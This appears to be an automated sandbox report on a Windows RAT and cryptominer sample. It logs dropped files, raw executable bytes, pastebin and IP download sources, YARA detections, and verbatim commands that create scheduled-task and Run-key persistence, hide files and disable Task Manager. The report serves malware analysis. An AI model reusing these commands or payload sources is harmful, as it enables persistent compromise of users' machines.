total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0
file C:\Windows (x86)\KBDMLT48.DLL
file C:\Windows (x86)\KBDBE.DLL
file C:\Windows (x86)\KBDCZ1.DLL
file C:\Windows (x86)\TRACERT.EXE
file C:\Windows (x86)\KBDLT.DLL
file C:\Users\test22\AppData\Local\Temp\versioncd.bat
file C:\Windows (x86)\KBDMYAN.DLL
file C:\Windows (x86)\KBDAZST.DLL
file C:\Windows (x86)\KBDNTL.DLL
file C:\Windows (x86)\KBDA2.DLL
file C:\Windows (x86)\KBDBENE.DLL
file C:\Windows (x86)\icmp.dll
file C:\Windows (x86)\KBDINDEV.DLL
file C:\Windows (x86)\asferror.dll
file C:\Windows (x86)\kbdgeoer.dll
file C:\Windows (x86)\KBDPASH.DLL
file C:\Windows (x86)\KBDBR.DLL
file C:\Windows (x86)\tier2punctuations.dll
file C:\Windows (x86)\KBDINTAM.DLL
file C:\Windows (x86)\KBDMONST.DLL
file C:\Users\test22\AppData\Local\Temp\hosting.bat
file C:\Windows (x86)\KBDHU.DLL
file C:\Windows (x86)\KBDSMSFI.DLL
file C:\Windows (x86)\KBDUKX.DLL
file C:\Windows (x86)\kbdax2.dll
file C:\Windows (x86)\KBDFR.DLL
file C:\Windows (x86)\KBDYCC.DLL
file C:\Windows (x86)\KBDINBE1.DLL
file C:\Windows (x86)\kbd101a.dll
file C:\Windows (x86)\KBDTUF.DLL
file C:\Windows (x86)\KBDBLR.DLL
file C:\Windows (x86)\KBDTUQ.DLL
file C:\Windows (x86)\KBDFTHRK.DLL
file C:\Windows (x86)\KBDIBO.DLL
file C:\Windows (x86)\kbd106.dll
file C:\Windows (x86)\KBDLT2.DLL
file C:\Users\test22\AppData\Local\Temp\version.bat
file C:\Windows (x86)\KBDTH3.DLL
file C:\Windows (x86)\KBDIT142.DLL
file C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe
file C:\Windows (x86)\KBDSL1.DLL
file C:\Windows (x86)\KBDRU.DLL
file C:\Windows (x86)\KBDUSL.DLL
file C:\Windows (x86)\KBDJAV.DLL
file C:\Windows (x86)\KBDMACST.DLL
file C:\Windows (x86)\KBDINASA.DLL
file C:\Windows (x86)\KBDDV.DLL
file C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat
file C:\Windows (x86)\kbdgeoqw.dll
file C:\Windows (x86)\KBDMAORI.DLL
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk
cmdline wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
cmdline wmic process where name='windowsapp.exe' delete
cmdline schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'"
cmdline wmic csproduct get UUID /format:list
cmdline wmic process where name='taskmgr.exe' delete
cmdline wmic process where name='xmrig.exe' delete
cmdline wmic process where name='Taskmgr.exe' delete
cmdline C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
cmdline wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
cmdline wmic process where name='xagal.exe' delete
cmdline C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
file C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe
file C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
file C:\Users\test22\AppData\Local\Temp\updateW\runx.vbs
file C:\Windows (x86)\xagal.exe
file C:\Windows (x86)\run.vbs
file C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat
file C:\Windows (x86)\xcls.bat
file C:\Windows (x86)\explorer.exe
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
file C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe
file C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe
file C:\Users\test22\AppData\Local\Temp\IE.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\sysnative\cmd
parameters: /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
filepath: C:\Windows\sysnative\cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd
parameters: /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
filepath: C:\Windows\System32\cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows (x86)\xcls.bat
parameters:
filepath: C:\Windows (x86)\xcls.bat
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $þ1 º`_Zº`_Zº`_Zü®Z·`_Zü¬Z1`_Zü­Z¢`_Z>\[¬`_Z>[[©`_Z>Z[–`_Z³ÜZ°`_Z³ÌZ¹`_Zº`^Z@`_Z->Z[Š`_Z->_[»`_Z(> Z»`_Z->][»`_ZRichº`_ZPELþ¶Yà âøÉÎ@ @@Œ4tŒ(°€FXPnT˜@ā .textËáâ `.rdata ˜šæ@@.dataò  €@À.gfidsè Œ@@.rsrc€F°HŽ@@.relocX Ö@B¹ËCéáK¹ØËCéƒZ¹ÄËC誴hñBè+ºYÃh—ñBèºYÃè Þ£XDÃhdDÿÄCh¡ñBèý¹YùˆDé|ò¹àFEèœÉh­ñBèݹYù±Dè†Éh·ñBèǹYù ²DèHhÁñBè±¹YÃÌÌÌÌÌÌÌÌÌÌÌ́ìXUVW‹¼$tt$d…ÿt.‹ÆWPèR‹ÆPèlt$rW4FVè<VèXƒÄ4FƒÆh¢è€¼PVèVè8hC4FƒÆVèVè!3ÉjXf‰LFD$(^VQPè¦Ä‹„$ŒƒÄ$€¼$x‹¬$p‹=ªC‰D$¡”ËC‰D$D$d‰D$‹„$l‰D$<D$ ‰t$ ‰l$(ÇD$,ÇD$@ Ptÿ ªCëÿ׋ð…öu/ÿªC=0u 3À8„$xf‰ED$ Ptÿ ªCëÿ׋ð…ö_^•À]ÄXÂU‹ìì,EüPÿXªC…Àt2Àë\‹E3ɉE܍…Ôýÿÿ‰Eä‹E ‰EèEÜWP‰MàÇEìA‰Mð‰Môÿ\ªC‹ø…ÿu2ÀëVÿuWÿ`ªC‹Mü‹ðWQ‹ÿR3À…ö^•À_‹å] ¶D$ Pÿt$ ÿt$ ÿ4«CPÿ0«C ¶D$ ÷ØÀƒà Pÿt$ ÿt$ ÿ4«CPÿ<«C U‹ìƒ} 0tY} u]ŠE ¹ÄËC$¶ÀPÿuÿuèD¸öE t>ÿuÿ(«C…Àt1h!0Pÿ4«C…Àt!öE th”CPÿ,«Cë ÿu¹ÄËCèÙ·2À]ÂU‹ìƒìL‹EM´ƒeø‰Eü‹E ‰E´ÇEôèÂê‹å]¸GíBè²QSV‹ñ‰uðèª}3ÛǘCŽ$‰]üèáIŽè ÆEüèý¬Ž€"‰žÐ!‰žÔ!èKŽÈEè@9]ÆEü”À‰ž¼!ˆ†¸!„Àt#h°rèW±Y‰EÆEü…Àt ‹È蓕ë‹Ãë‹E‰†¼!Š€™QƒŽÀ!ÿƒŽÄ!ÿƒŽÈ!ÿj@ˆF†"SPdžøl‰žül‰žm‰žm‰žÐ!‰žÔ!ˆžmf‰ž m‰žØ!‰žèl‰žìl‰žðl‰žôlèvÁj4†H"SPègÁj †ˆESPèXÁ‹MôƒÄ$‰ž m3À‰ž(m‰ž,m‰ž0m‰ž4m‰ž8m‰ž<mf‰†Bm‹Æˆžmˆž@mˆžà!^[d‰ ‹å]ÂQ3À‰ $‰ ‰$‰(‰,ˆ0‰8‰<‰@‰D‰H‰L‹ÁYÃU‹ìd¡jÿh¡ðBPd‰%V‹ñƒ>t€~t ÿvÿ6èÇÿ6èùY‹Môd‰ ^‹å]ÃU‹ìd¡jÿh¡ðBPd‰%V‹ñƒ>t€~t ‹FÀPÿ6èÅÆÿ6è¯Y‹Môd‰ ^‹å]ÃV‹ñ€¾¸!ǘCt W‹¾¼!…ÿt‹ÏèG”h°rWèb¯YY_ŽèUè2ÿÿÿŽ 2è'ÿÿÿŽè 諍Ž$èôG‹Î^é{Á éþþÿÿU‹ìd¡‹Ñjÿh¡ðBPd‰%‹ jÿr ‹ÿrÿP ‹Môd‰ ‹å]ÃV‹ñèPÿÿÿöD$t hH}VèÏ®YY‹Æ^‹D$V‹ñF‹N;N†‹F SU½ØËCW…Àt;ÈvPh°CUèlTƒÄ ‹ÍèšT‹F‹^ÁèƒÀ F;Øw‹Ø€~St:èz‹øY…ÿu‹ÍèkTƒ>t8ÿvÿ6Wè7ÀƒÄ ÿvÿ6èYÅÿ6èCYëÿ6èI‹øYY…ÿu‹Íè.T‰>_]‰^[^‹D$V‹ñF‹N;N†¦‹F SU½ØËCW…Àt;ÈvPh°CUèµSƒÄ ‹ÍèãS‹F‹^ÁèƒÀ F;Øw‹Ø€~Pt@èÀ‹øY…ÿu‹Íè±Sƒ>t>‹FÀPÿ6Wèz¿‹FƒÄ ÀPÿ6è™Äÿ6èƒYëÿ6艋øYY…ÿu‹ÍènS‰>_]‰^[^‹D$;Av +APè.ÿÿÿë‰AÂVÿt$‹ñèÿ„Àu8† mu FPj7èÜúÿÿj¹ØËCèÜR^€¹m‹T$t‹Â÷Ð@ƒàЃ¹øluƒÂëƒÂ‹Â¸YíBèÚ¬ƒìW‹ù€¿þlu2Àë}‹S‰}äÿP‰Eì‰Uð3ۋω]ü8Ÿ$"t#‹‡m‹ƒÀSSPÿR ‹Ïè‹E9X—Ãë1V‹7Sè’RP‹ÏÿV hC‹ÏèË"^…Àtÿu‹Ï軄Àt³MäèýÿÿŠÃ[‹Mô_d‰ ‹å]¸síBè/¬ƒì SVW‹ù3Ûj‹·ø!VˆŸmˆŸ mÿPƒøt2ÀéöjV‰Ÿmèû…Àt(‰‡ølƒø…ÿ‹7‹ÏSÿVƒè‹ÏÓRPÿV éæh MÔèAS‹‹Ï‰]üÿP‹M؋ƒÁðQÿuԋωEìÿR‹È‹ó‰Mð…ÉŽŽ‹MÔ΀9RuJ+ÆPQè‚…Àt:‹M쉇ølƒøu6…ö~2ƒù}-ƒ}ð~'‹EÔ+Á€xRu€xSu €xFu€xXt ‹EðF;ð|§ë3‹SSP‹Ï‰‡mÿR ‹‡ølƒøtƒøu‹ø!jQ‹ÏÿPMÔ9Ÿmu è½úÿÿéâþÿÿƒMüÿè¯úÿÿ‹‡ølƒøuGPj:è„øÿÿé¾þÿÿƒøu%‹·ÿ!jV‹ÏÿP€>… þÿÿLJ"ë,LJ"ë ‹‡Ü!ƒøt €¿à!tƒøt‹Ï觋Ïèó…ÀuՀ¿ mt €}„Jþÿÿ‹Ïè‚€¿ mtGPjèð÷ÿÿ€}„%þÿÿ€¿à!Š‡$"ˆ‡þlt €¿m…Ú‹‹Ï‰}ØÿP‰Eà‰U䋇ìl‹·èl‰E‹‡ðl‰E싇ôl‰Eð‹‡Ü!ÇEü‰Eèë=‹‡Ü!ƒøu!€¿ýlt€¿XVu3À@ë‹Ãˆ‡më ƒøtƒøt/‹Ïè‹Ïè…Àu¸ë€¿ýlt €¿3u3ÛCˆŸm‹
request_handle: 0x0000000000cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $’É]Ö~§Ö~§Ö~§bâVÛ~§bâTZ~§bâUÎ~§HÞ`×~§í ¤À~§í £Å~§í ¢ú~§ß$Ü~§ß4Ó~§Ö~¦Ý§A ¢æ~§A §×~§D X×~§A ¥×~§RichÖ~§PELˆ±[à ê¢IÕ@À@°Œ4äŒ<ÀÐß ÜÀnT@\4‚ .text$éê `.rdataŒšœî@@.data   Š@À.gfidsè°–@@.rsrcÐßÀà˜@@.relocÜ  x@B¹ ËCé&M¹èËCéù[¹ÔËCè{¶hÜøBè«ÀYÃhæøBèŸÀYÃè&à£hDÃhtDÿÄChðøBè}ÀYù˜Dé¦ô¹ðæDèkËhüøBè]ÀYùúWEèUËhùBèGÀYù*ADè?ËhùBè1ÀYù0BDèsIhùBèÀYÃÌÌÌÌÌ́ìXUVW‹¼$tt$d…ÿt.‹ÆWPè‹ÆPèt$rW4FVèì VèƒÄ4FƒÆh¢èA¾PVèÌ Vèè hàC4FƒÆVèµ VèÑ 3ÉjXf‰LFD$(^VQPèfË‹„$ŒƒÄ$€¼$x‹¬$p‹=$ªC‰D$¡¤ËC‰D$D$d‰D$‹„$l‰D$<D$ ‰t$ ‰l$(ÇD$,ÇD$@ PtÿªCëÿ׋ð…öu/ÿ ªC=0u 3À8„$xf‰ED$ PtÿªCëÿ׋ð…ö_^•À]ÄXÂU‹ìì,EüPÿhªC…Àt2Àë\‹E3ɉE܍…Ôýÿÿ‰Eä‹E ‰EèEÜWP‰MàÇEìA‰Mð‰MôÿlªC‹ø…ÿu2ÀëVÿuWÿpªC‹Mü‹ðWQ‹ÿR3À…ö^•À_‹å] ¶D$ Pÿt$ ÿt$ ÿD«CPÿ@«C ¶D$ ÷ØÀƒà Pÿt$ ÿt$ ÿD«CPÿL«C U‹ìƒ} 0tY} u]ŠE ¹ÔËC$¶ÀPÿuÿuèºöE t>ÿuÿ8«C…Àt1h!0PÿD«C…Àt!öE thäCPÿ<«Cë ÿu¹ÔËC蚹2À]ÂU‹ìƒìL‹EM´ƒeø‰Eü‹E ‰E´ÇEôè½ì‹å]ÂVÿt$‹ñ3À‰‰F‰F‰F ˆFèX‹Æ^¸—ôBèR¸QSV‹ñ‰uðè 3ÛÇèCŽ$‰]üèôJŽè ÆEü胮Ž€"‰žÐ!‰žÔ!èKŽÈEè@9]ÆEü”À‰ž¼!ˆ†¸!„Àt#h°‚蘷Y‰EÆEü…Àt ‹Èèò–ë‹Ãë‹E‰†¼!Š€™aƒŽÀ!ÿƒŽÄ!ÿƒŽÈ!ÿj@ˆF†"SPdž l‰ž¤l‰ž¨l‰ž°l‰žÐ!‰žÔ!ˆž¬lf‰ž´l‰žØ!‰žl‰ž”l‰ž˜l‰žœlèÈj4†H"SPèÈj †ˆESPèöÇ‹MôƒÄ$‰žÈl3À‰žÐl‰žÔl‰žØl‰žÜl‰žàl‰žälf‰†êl‹ÆˆžÆlˆžèlˆžà!^[d‰ ‹å]ÂQ3À‰ $‰ ‰$‰(‰,ˆ0‰8‰<‰@‰D‰H‰L‹ÁYÃU‹ìd¡jÿhöBPd‰%V‹ñƒ>t€~t ÿvÿ6è¬Èÿ6è‡ Y‹Môd‰ ^‹å]ÃU‹ìd¡jÿhöBPd‰%V‹ñƒ>t€~t ‹FÀPÿ6èbÈÿ6è= Y‹Môd‰ ^‹å]ÃV‹ñ€¾¸!ÇèCt W‹¾¼!…ÿt‹Ï覕h°‚W裵YY_ŽèUè2ÿÿÿŽ 2è'ÿÿÿŽè 蔬Ž$èI‹Î^éu|Á éþþÿÿU‹ìd¡jÿhöBPd‰%V‹ñ‹‹ÿP„Àt‹jÿv ‹ÿvÿP‹Môd‰ ^‹å]ÃV‹ñèCÿÿÿöD$t hð|VèµYY‹Æ^‹D$V‹ñF‹N;N†‹F SU½èËCW…Àt;ÈvPhCUè£UƒÄ ‹ÍèÑU‹F‹^ÁèƒÀ F;Øw‹Ø€~St:èû‹øY…ÿu‹Íè¢Uƒ>t8ÿvÿ6WèÈÆƒÄ ÿvÿ6èéÆÿ6èÄYëÿ6èÊ‹øYY…ÿu‹ÍèeU‰>_]‰^[^‹D$V‹ñF‹N;N†¦‹F SU½èËCW…Àt;ÈvPhCUèìTƒÄ ‹ÍèU‹F‹^ÁèƒÀ F;Øw‹Ø€~Pt@èA‹øY…ÿu‹ÍèèTƒ>t>‹FÀPÿ6Wè Æ‹FƒÄ ÀPÿ6è)Æÿ6èYëÿ6è ‹øYY…ÿu‹Íè¥T‰>_]‰^[^‹D$;Av +APè.ÿÿÿë‰AÂVÿt$‹ñè„Àu8†µlu FPj9è­úÿÿj¹èËCèT^€¹¬l‹T$t‹Â÷Ð@ƒàЃ¹ luƒÂëƒÂ‹Â¸ŸöB賃ìW‹ù€¿¦lu2À銋S‰}äÿP‰Eì‰Uð3ۋω]ü8Ÿ$"t0‹‡°l‹ƒÀSSPÿR‹Ïè …ÀtEƒ¿Ü!uu<‹E9X—Ãë1V‹7SèÍRP‹ÏÿVh`C‹Ïèò#^…Àtÿu‹Ïè„Àt³MäèýÿÿŠÃ[‹Mô_d‰ ‹å]¸±ôBèT²ƒì$SVW‹ù3Ûj‹·ø!VˆŸ¬lˆŸ´lÿP ƒøt2ÀéCjV‰Ÿ°lèP…Àt(‰‡ lƒø…ÿ‹7‹ÏSÿVƒè‹ÏÓRPÿVéæh MÐè_ùÿÿ‹‹Ï‰]üÿP‹MԋƒÁðQÿuЋωEèÿR ‹È‹ó‰Mì…ÉŽŽ‹MÐ΀9RuJ+ÆPQè×…Àt:‹M艇 lƒøu6…ö~2ƒù}-ƒ}ì~'‹EÐ+Á€xRu€xSu €xFu€xXt ‹EìF;ð|§ë3‹SSP‹Ï‰‡°lÿR‹‡ lƒøtƒøu‹ø!jQ‹ÏÿP MÐ9Ÿ°lu è úÿÿéâþÿÿƒMüÿè’úÿÿ‹‡ lƒøuGPj<èEøÿÿé¾þÿÿƒøu.‹·ÿ!jV‹ÏÿP ƒø… þÿÿ€>…—þÿÿLJ"ë LJ"‹Ïˆ]óèâ…À•ÀˆEò<u>ˆ]ó‹Ïè÷‹‡Ü!ƒø„Ñ€¿à!t ƒø„¿‹Ï褅À•ÀˆEò<tŊE󊏵l„Ét €}„þÿÿ€¿´lu„Àu„Éu GPjè|÷ÿÿ€}„ðýÿÿ€}òŠ‡$"ˆ‡¦l„û€¿à!t €¿¬l…勋ω}ÔÿP‰E܉Uà‹‡”l‹·l
request_handle: 0x0000000000cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x000000000000026c
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x0000000000000270
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x0000000000000274
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x0000000000000278
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x000000000000025c
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x0000000000000290
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x0000000000000294
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x0000000000000298
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x000000000000029c
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002a0
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002a4
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002a8
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002ac
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002b0
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x0000000000000138
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002bc
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002c0
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002c4
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002c8
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002cc
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002d0
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002d4
process_name: conhost.exe
process_identifier: 2576
0 0

Process32NextW

snapshot_handle: 0x00000000000002d8
process_name: conhost.exe
process_identifier: 2576
0 0
url https://pastebin.com/raw/DVn2TV4Q
url http://54.254.238.33
url https://pastebin.com/raw/GUqDzHQW
url https://pastebin.com/raw/h6SvjTQp
url http://crl.comodo.net/TrustedCertificateServices.crl0
url http://users.ocsp.d-trust.net03
url http://crl.ssc.lt/root-b/cacrl.crl0
url http://crl.securetrust.com/STCA.crl0
url http://crl.securetrust.com/SGCA.crl0
url http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url http://www.ssc.lt/cps03
url http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url http://www.pkioverheid.nl/policies/root-policy0
url http://cps.chambersign.org/cps/chambersroot.html0
url http://www.e-szigno.hu/SZSZ/0
url http://www.entrust.net/CRL/Client1.crl0
url http://crl.chambersign.org/publicnotaryroot.crl0
url https://xmrig.com/wizard
url http://www.certplus.com/CRL/class3.crl0
url http://logo.verisign.com/vslogo.gif0
url http://www.acabogacia.org/doc0
url http://www.disig.sk/ca/crl/ca_disig.crl0
url https://www.catcert.net/verarrel
url http://www.sk.ee/cps/0
url http://www.quovadis.bm0
url https://www.catcert.net/verarrel05
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url https://L
url http://crl.chambersign.org/chambersroot.crl0
url https://H
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url http://crl.globalsign.net/root-r2.crl0
url http://certificates.starfieldtech.com/repository/1604
url http://www.d-trust.net0
url http://crl.comodo.net/AAACertificateServices.crl0
url http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url http://crl.ssc.lt/root-a/cacrl.crl0
url http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url http://www.certicamara.com/certicamaraca.crl0
url http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url http://www.post.trust.ie/reposit/cps.html0
url http://www.d-trust.net/crl/d-trust_qualified_root_ca_1_2007_pn.crl0
url http://www2.public-trust.com/crl/ct/ctroot.crl0
url http://www.certicamara.com0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description Communications use DNS rule Network_DNS
description Match Windows Inet API call rule Str_Win32_Internet_API
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Steal credential rule local_credential_Steal
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description File Downloader rule Network_Downloader
description Escalate priviledges rule Escalate_priviledges
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
cmdline attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector"
cmdline cmd /c del "C:\Users\test22\AppData\Local\Temp\hosting.bat"
cmdline wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline cmd /c del "C:\Windows (x86)\version.bat"
cmdline "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
cmdline wmic process where name='windowsapp.exe' delete
cmdline schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'"
cmdline C:\Windows\System32\cmd /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
cmdline wmic csproduct get UUID /format:list
cmdline wmic process where name='taskmgr.exe' delete
cmdline REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
cmdline wmic process where name='xmrig.exe' delete
cmdline attrib -s -h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
cmdline wmic process where name='Taskmgr.exe' delete
cmdline cmd /c del "C:\Users\test22\AppData\Local\Temp\version.bat"
cmdline attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
cmdline attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\*.*"
cmdline C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
cmdline wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline attrib +s +h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
cmdline REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
cmdline "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
cmdline wmic process where name='xagal.exe' delete
cmdline C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
